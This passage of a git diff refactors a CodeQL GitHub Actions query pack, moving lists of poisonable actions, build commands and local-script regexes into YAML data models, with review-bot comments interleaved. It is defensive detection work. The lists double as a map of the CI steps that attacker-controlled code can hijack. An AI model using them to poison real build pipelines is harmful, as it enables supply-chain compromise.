manual}/tj-actions_branch-names.model.yml (100%) rename ql/lib/ext/{ => manual}/trilom_file-changes-action.model.yml (100%) rename ql/lib/ext/{ => manual}/tripss_conventional-changelog-action.model.yml (100%) rename ql/lib/ext/{ => manual}/tryghost_action-deploy-theme.model.yml (100%) rename ql/lib/ext/{ => manual}/tzkhan_pr-update-action.model.yml (100%) rename ql/lib/ext/{ => manual}/veracode_veracode-sca.model.yml (100%) rename ql/lib/ext/{ => manual}/wearerequired_lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/webfactory_ssh-agent.model.yml (100%) rename ql/lib/ext/{ => manual}/xt0rted_slash-command-action.model.yml (100%) rename ql/lib/ext/{ => manual}/zaproxy_action-baseline.model.yml (100%) rename ql/lib/ext/{ => manual}/zaproxy_action-full-scan.model.yml (100%) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index da54833e9a6..8d965c3e4c7 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -1,7 +1,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Helper -private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.config.Config /** * Gets the length of each line in the StringValue . diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll new file mode 100644 index 00000000000..d6a85c426c6 --- /dev/null +++ b/ql/lib/codeql/actions/config/Config.qll 
@@ -0,0 +1,74 @@ +import ConfigExtensions as Extensions + +/** + * MaD models for workflow details + * Fields: + * - path: Path to the workflow file + * - trigger: Trigger for the workflow + * - job: Job name + * - secrets_source: Source of secrets + * - permissions: Permissions for the workflow + * - runner: Runner info for the workflow + */ +predicate workflowDataModel( + string path, string trigger, string job, string secrets_source, string permissions, string runner +) { + Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +} + +/** + * MaD models for repository details + * Fields: + * - visibility: Visibility of the repository + * - default_branch_name: Default branch name + */ +predicate repositoryDataModel(string visibility, string default_branch_name) { + Extensions::repositoryDataModel(visibility, default_branch_name) +} + +/** + * MaD models for context/trigger mapping + * Fields: + * - trigger: Trigger for the workflow + * - context_prefix: Prefix for the context + */ +predicate contextTriggerDataModel(string trigger, string context_prefix) { + Extensions::contextTriggerDataModel(trigger, context_prefix) +} + +/** + * MaD models for externally triggerable events + * Fields: + * - event: Event name + */ +predicate externallyTriggerableEventsDataModel(string event) { + Extensions::externallyTriggerableEventsDataModel(event) +} + +/** + * MaD models for poisonable commands + * Fields: + * - regexp: Regular expression for matching poisonable commands + */ +predicate poisonableCommandsDataModel(string regexp) { + Extensions::poisonableCommandsDataModel(regexp) +} + +/** + * MaD models for poisonable local scripts + * Fields: + * - regexp: Regular expression for matching poisonable local scripts + * - group: Script capture group number for the regular expression + */ +predicate poisonableLocalScriptsDataModel(string regexp, int group) { + Extensions::poisonableLocalScriptsDataModel(regexp, group) +} + +/** + * MaD models for 
poisonable actions + * Fields: + * - action: action name + */ +predicate poisonableActionsDataModel(string action) { + Extensions::poisonableActionsDataModel(action) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll new file mode 100644 index 00000000000..3ca4b6a7559 --- /dev/null +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -0,0 +1,41 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if workflow data model exists for the given parameters. + */ +extensible predicate workflowDataModel( + string path, string trigger, string job, string secrets_source, string permissions, string runner +); + +/** + * Holds if repository data model exists for the given parameters. + */ +extensible predicate repositoryDataModel(string visibility, string default_branch_name); + +/** + * Holds if a context expression starting with context_prefix is available for a given trigger. + */ +extensible predicate contextTriggerDataModel(string trigger, string context_prefix); + +/** + * Holds if a given trigger event can be fired by an external actor. + */ +extensible predicate externallyTriggerableEventsDataModel(string event); + +/** + * Holds for strings that match poisonable commands. + */ +extensible predicate poisonableCommandsDataModel(string regexp); + +/** + * Holds for strings that match poisonable local scripts. + */ +extensible predicate poisonableLocalScriptsDataModel(string regexp, int group); + +/** + * Holds for actions that can be poisoned through local files. + */ +extensible predicate poisonableActionsDataModel(string action); + diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index d0b84f918d5..2cb8c56b147 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
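Review bot: `import ConfigExtensions as Extensions` at the top of Config.qll is a public import, so the `Extensions` alias and the raw extensible predicates are re-exported to every importer of this module alongside the wrappers defined here. ExternalFlow.qll, where these wrappers came from, uses `private import internal.ExternalFlowExtensions as Extensions`. The same form here, `private import ConfigExtensions as Extensions`, keeps the wrappers as the only public surface.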
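Review bot: The QLDoc on `poisonableCommandsDataModel` and `poisonableLocalScriptsDataModel` in ConfigExtensions.qll does not state the contract a model author needs: which regex dialect applies, whether the pattern must match the whole command or any part of it, and what `group` selects. These rows decide which steps the poisoning queries treat as dangerous, so a pattern written for the wrong matching mode fails silently as a missed finding. I would extend the comments, for example `Holds for regular expressions matching commands that run code from the workspace (matched as <full|partial> match)` and `group is the capture group number holding the script path`, with the matching mode filled in from the consuming code, which is not in this hunk.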
@@ -2,51 +2,6 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions -/** - * MaD models for workflow details - * Fields: - * - path: Path to the workflow file - * - trigger: Trigger for the workflow - * - job: Job name - * - secrets_source: Source of secrets - * - permissions: Permissions for the workflow - * - runner: Runner info for the workflow - */ -predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, string runner -) { - Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) -} - -/** - * MaD models for repository details - * Fields: - * - visibility: Visibility of the repository - * - default_branch_name: Default branch name - */ -predicate repositoryDataModel(string visibility, string default_branch_name) { - Extensions::repositoryDataModel(visibility, default_branch_name) -} - -/** - * MaD models for context/trigger mapping - * Fields: - * - trigger: Trigger for the workflow - * - context_prefix: Prefix for the context - */ -predicate contextTriggerDataModel(string trigger, string context_prefix) { - Extensions::contextTriggerDataModel(trigger, context_prefix) -} - -/** - * MaD models for externally triggerable events - * Fields: - * - event: Event name - */ -predicate externallyTriggerableEventsDataModel(string event) { - Extensions::externallyTriggerableEventsDataModel(event) -} - /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 7217796d138..b09664359ab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -1,5 +1,6 @@ -private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.config.Config +private import codeql.actions.dataflow.ExternalFlow /** * A data flow source. diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 05f71cfc0be..bd9d73b4170 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -22,25 +22,3 @@ extensible predicate actionsSummaryModel( extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); - -/** - * Holds if workflow data model exists for the given parameters. - */ -extensible predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, string runner -); - -/** - * Holds if repository data model exists for the given parameters. - */ -extensible predicate repositoryDataModel(string visibility, string default_branch_name); - -/** - * Holds if a context expression starting with context_prefix is available for a given trigger. - */ -extensible predicate contextTriggerDataModel(string trigger, string context_prefix); - -/** - * Holds if a given trigger event can be fired by an external actor. - */ -extensible predicate externallyTriggerableEventsDataModel(string event); diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 44c3c64a5a6..d2853591d61 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -254,8 +254,8 @@ class ArtifactPoisoningSink extends DataFlow::Node { poisonable.(UsesStep) = this.asExpr() ) and ( - not poisonable instanceof LocalCommandExecutionRunStep or - poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath() + "%") + not poisonable instanceof LocalScriptExecutionRunStep or + poisonable.(LocalScriptExecutionRunStep).getCommand().matches(download.getPath() + "%") ) ) } diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index e80ea71c958..1a3e7b2b2f7 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.config.Config string defaultBranchTriggerEvent() { result = diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index b1d5269d44a..d9978b2a423 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -1,67 +1,35 @@ import actions +import codeql.actions.config.Config abstract class PoisonableStep extends Step { } -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { - result = - [ - "pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", - "ruby/setup-ruby", "actions/jekyll-build-pages" - ] + exists(string action | + poisonableActionsDataModel(action) and + result = action + ) } class DangerousActionUsesStep extends PoisonableStep, UsesStep { DangerousActionUsesStep() { this.getCallee() = dangerousActions() } } -// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 -private string dangerousCommands() { - result = - [ - "npm i(nstall)?(\\b|$)", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", - "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", - "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", - "poetry run", "cargo " - ] -} - -class BuildRunStep extends PoisonableStep, Run { - BuildRunStep() { - exists( - this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) +class PoisonableCommandStep extends PoisonableStep, Run { + PoisonableCommandStep() { + exists(string regexp | + poisonableCommandsDataModel(regexp) and + exists(this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + regexp, _, _)) ) } } -bindingset[cmdRegexp] -string wrapLocalCmd(string cmdRegexp) { result = "(^|;\\s*|\\s+)" + cmdRegexp + "(\\s+|;|$)" } - -class LocalCommandExecutionRunStep extends PoisonableStep, Run { +class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; - LocalCommandExecutionRunStep() { - // Heuristic: - exists(string line | line = 
this.getScript().splitAt("\n").trim() | - // ./xxxx - // TODO: It could also be in the form of `dir/cmd` - cmd = line.regexpCapture(wrapLocalCmd("\\.\\/(.*)"), 2) - or - // sh xxxx - cmd = line.regexpCapture(wrapLocalCmd("(ba|z|fi)?sh\\s+(.*)"), 3) - or - // node xxxx.js - cmd = line.regexpCapture(wrapLocalCmd("node\\s+(.*)(\\.js|\\.ts)"), 2) - or - // python xxxx.py - cmd = line.regexpCapture(wrapLocalCmd("python\\s+(.*)\\.py"), 2) - or - // ruby xxxx.rb - cmd = line.regexpCapture(wrapLocalCmd("ruby\\s+(.*)\\.rb"), 2) - or - // go xxxx.go - cmd = line.regexpCapture(wrapLocalCmd("go\\s+(.*)\\.go"), 2) + LocalScriptExecutionRunStep() { + exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | + poisonableLocalScriptsDataModel(regexp, group) and + cmd = line.regexpCapture(regexp, group) ) } diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 03b6c87405e..419b2ac81a9 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.config.Config bindingset[runner] predicate isGithubHostedRunner(string runner) { diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/config/context_event_map.yml similarity index 78% rename from ql/lib/ext/workflow-models/workflow-models.yml rename to ql/lib/ext/config/context_event_map.yml index 1f0401e8e61..e09dab14f2b 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -1,12 +1,4 @@ extensions: - - addsTo: - pack: github/actions-all - extensible: repositoryDataModel - data: [] - - addsTo: - pack: github/actions-all - extensible: workflowDataModel - data: [] - addsTo: pack: github/actions-all extensible: contextTriggerDataModel 
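Review bot: In PoisonableSteps.qll, `dangerousActions()` no longer needs the `exists`, since its body only copies the bound variable into `result`; `private string dangerousActions() { poisonableActionsDataModel(result) }` is equivalent, or `DangerousActionUsesStep` can test `poisonableActionsDataModel(this.getCallee())` directly. The step classes are also left without any comment now that the `// source:` lines have moved to the YAML file; a one-line QLDoc on each, such as `/** A run step whose script matches a pattern from poisonableCommandsDataModel. */`, would keep the link between class and data visible. `LocalScriptExecutionRunStep` continues past the end of the hunk, so its remaining members are not reviewed here.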
@@ -54,19 +46,4 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] - - addsTo: - pack: github/actions-all - extensible: externallyTriggerableEventsDataModel - data: - - ["discussion"] - - ["discussion_comment"] - - ["fork"] - - ["issue_comment"] - - ["issues"] - - ["pull_request"] - - ["pull_request_comment"] - - ["pull_request_review"] - - ["pull_request_review_comment"] - - ["pull_request_target"] - - ["workflow_run"] # depending on trigger workflow - - ["workflow_call"] # depending on caller + diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml new file mode 100644 index 00000000000..88d17c728b7 --- /dev/null +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: externallyTriggerableEventsDataModel + data: + - ["discussion"] + - ["discussion_comment"] + - ["fork"] + - ["issue_comment"] + - ["issues"] + - ["pull_request"] + - ["pull_request_comment"] + - ["pull_request_review"] + - ["pull_request_review_comment"] + - ["pull_request_target"] + - ["workflow_run"] # depending on trigger workflow + - ["workflow_call"] # depending on caller + diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml new file mode 100644 index 00000000000..9a9af08872c --- /dev/null +++ b/ql/lib/ext/config/poisonable_steps.yml 
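Review bot: The new file is named `externally_triggereable_events.yml`, while the predicate it feeds is `externallyTriggerableEventsDataModel`; renaming it to `externally_triggerable_events.yml` in this commit avoids carrying the typo into anything that later refers to the path. The trailing comments on the `workflow_run` and `workflow_call` rows say they are externally triggerable only depending on the triggering workflow or caller, so a comment above `data:` noting that the list is deliberately an over-approximation would help whoever triages the resulting alerts.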
@@ -0,0 +1,55 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: poisonableActionsDataModel
+ # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16
+ # source: https://boostsecurityio.github.io/lotp/
+ data:
+ - ["pre-commit/action"]
+ - ["oxsecurity/megalinter"]
+ - ["bridgecrewio/checkov-action"]
+ - ["ruby/setup-ruby"]
+ - ["actions/jekyll-build-pages"]
+ - addsTo:
+ pack: github/actions-all
+ extensible: poisonableCommandsDataModel
+ # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23
+ # source: https://boostsecurityio.github.io/lotp/
+ data:
+ - ["ant "]
+ - ["bundle install"]
+ - ["bundle exec "]
+ - ["cargo "]
+ - ["go generate"]
+ - ["gomplate "]
+ - ["gradle "]
+ - ["java -jar "]
+ - ["make "]
+ - ["mkdocs build"]
+ - ["msbuild "]
+ - ["mvn "]
+ - ["npm i(nstall)?(\\b|$)"]
+ - ["npm run "]
+ - ["npm ci(\\b|$)"]
+ - ["pip install -r "]
+ - ["pip install --requirement"]
+ - ["poetry install"]
+ - ["poetry run"]
+ - ["pre-commit run"]
+ - ["pre-commit install"]
+ - ["pytest"]
+ - ["terraform plan"]
+ - ["terraform apply"]
+ - ["yarn "]
+ - addsTo:
+ pack: github/actions-all
+ extensible: poisonableLocalScriptsDataModel
+ data:
+ # TODO: It could also be in the form of `dir/cmd`
+ - ["(^|;\\s*|\\s+)(\\.\\/)(.*)(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(python)\\s+(.*)\\.py(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3]
+ - ["(^|;\\s*|\\s+)(go)\\s+(.*)\\.go(\\s+|;|$)", 3]
+
diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/ql/lib/ext/config/workflow_runtime_data.yml
new file mode 100644
index 00000000000..88e266d8142
--- /dev/null
+++ b/ql/lib/ext/config/workflow_runtime_data.yml
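Review bot: The `["ant "]` row in poisonable_steps.yml drops the anchor that the removed QL list carried (`"^ant "`), so the move is not behaviour-preserving. `PoisonableCommandStep` still prepends `([^a-z]|^)`, which means the pattern now matches `ant ` after any character that is not a lowercase letter anywhere in a line, where the old one could only match at the start of a line. If that widening is not intended, the row should be `- ["^ant "]`. The shell row in `poisonableLocalScriptsDataModel` likewise adds `source` to what was `(ba|z|fi)?sh`; both changes alter what the queries flag and deserve a line in the commit message or a comment beside the row.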
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: repositoryDataModel + data: [] + - addsTo: + pack: github/actions-all + extensible: workflowDataModel + data: [] diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/manual/8398a7_action-slack.model.yml similarity index 100% rename from ql/lib/ext/8398a7_action-slack.model.yml rename to ql/lib/ext/manual/8398a7_action-slack.model.yml diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml similarity index 100% rename from ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml rename to ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/manual/actions_github-script.model.yml similarity index 100% rename from ql/lib/ext/actions_github-script.model.yml rename to ql/lib/ext/manual/actions_github-script.model.yml diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml similarity index 100% rename from ql/lib/ext/ahmadnassri_action-changed-files.model.yml rename to ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml similarity index 100% rename from ql/lib/ext/akhileshns_heroku-deploy.model.yml rename to ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml similarity index 100% rename from ql/lib/ext/amannn_action-semantic-pull-request.model.yml rename to ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml 
diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/manual/anchore_sbom-action.model.yml similarity index 100% rename from ql/lib/ext/anchore_sbom-action.model.yml rename to ql/lib/ext/manual/anchore_sbom-action.model.yml diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/manual/anchore_scan-action.model.yml similarity index 100% rename from ql/lib/ext/anchore_scan-action.model.yml rename to ql/lib/ext/manual/anchore_scan-action.model.yml diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml similarity index 100% rename from ql/lib/ext/andresz1_size-limit-action.model.yml rename to ql/lib/ext/manual/andresz1_size-limit-action.model.yml diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/manual/android-actions_setup-android.model.yml similarity index 100% rename from ql/lib/ext/android-actions_setup-android.model.yml rename to ql/lib/ext/manual/android-actions_setup-android.model.yml diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml similarity index 100% rename from ql/lib/ext/apple-actions_import-codesign-certs.model.yml rename to ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/manual/asdf-vm_actions.model.yml similarity index 100% rename from ql/lib/ext/asdf-vm_actions.model.yml rename to ql/lib/ext/manual/asdf-vm_actions.model.yml diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml similarity index 100% rename from ql/lib/ext/ashley-taylor_read-json-property-action.model.yml rename to ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml 
diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml similarity index 100% rename from ql/lib/ext/ashley-taylor_regex-property-action.model.yml rename to ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml similarity index 100% rename from ql/lib/ext/aszc_change-string-case-action.model.yml rename to ql/lib/ext/manual/aszc_change-string-case-action.model.yml diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml similarity index 100% rename from ql/lib/ext/aws-actions_configure-aws-credentials.model.yml rename to ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml similarity index 100% rename from ql/lib/ext/axel-op_googlejavaformat-action.model.yml rename to ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml similarity index 100% rename from ql/lib/ext/azure_powershell.model.yml rename to ql/lib/ext/manual/azure_powershell.model.yml diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/manual/bahmutov_npm-install.model.yml similarity index 100% rename from ql/lib/ext/bahmutov_npm-install.model.yml rename to ql/lib/ext/manual/bahmutov_npm-install.model.yml diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml similarity index 100% rename from ql/lib/ext/blackducksoftware_github-action.model.yml rename to ql/lib/ext/manual/blackducksoftware_github-action.model.yml 
diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/manual/bobheadxi_deployments.model.yml similarity index 100% rename from ql/lib/ext/bobheadxi_deployments.model.yml rename to ql/lib/ext/manual/bobheadxi_deployments.model.yml diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-breaking-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-lint-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-setup-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/manual/cachix_cachix-action.model.yml similarity index 100% rename from ql/lib/ext/cachix_cachix-action.model.yml rename to ql/lib/ext/manual/cachix_cachix-action.model.yml diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/manual/changesets_action.model.yml similarity index 100% rename from ql/lib/ext/changesets_action.model.yml rename to ql/lib/ext/manual/changesets_action.model.yml diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml similarity index 100% rename from ql/lib/ext/cloudflare_wrangler-action.model.yml rename to ql/lib/ext/manual/cloudflare_wrangler-action.model.yml 
diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/manual/coursier_cache-action.model.yml similarity index 100% rename from ql/lib/ext/coursier_cache-action.model.yml rename to ql/lib/ext/manual/coursier_cache-action.model.yml diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml similarity index 100% rename from ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml rename to ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml similarity index 100% rename from ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml rename to ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/manual/csexton_release-asset-action.model.yml similarity index 100% rename from ql/lib/ext/csexton_release-asset-action.model.yml rename to ql/lib/ext/manual/csexton_release-asset-action.model.yml diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml similarity index 100% rename from ql/lib/ext/cycjimmy_semantic-release-action.model.yml rename to ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/manual/cypress-io_github-action.model.yml similarity index 100% rename from ql/lib/ext/cypress-io_github-action.model.yml rename to ql/lib/ext/manual/cypress-io_github-action.model.yml diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml similarity index 100% rename from ql/lib/ext/dailydotdev_action-devcard.model.yml rename to ql/lib/ext/manual/dailydotdev_action-devcard.model.yml 
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml similarity index 100% rename from ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml rename to ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml similarity index 100% rename from ql/lib/ext/daspn_private-actions-checkout.model.yml rename to ql/lib/ext/manual/daspn_private-actions-checkout.model.yml diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml similarity index 100% rename from ql/lib/ext/dawidd6_action-ansible-playbook.model.yml rename to ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml similarity index 100% rename from ql/lib/ext/dawidd6_action-download-artifact.model.yml rename to ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml similarity index 100% rename from ql/lib/ext/delaguardo_setup-clojure.model.yml rename to ql/lib/ext/manual/delaguardo_setup-clojure.model.yml diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml similarity index 100% rename from ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml rename to ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml 
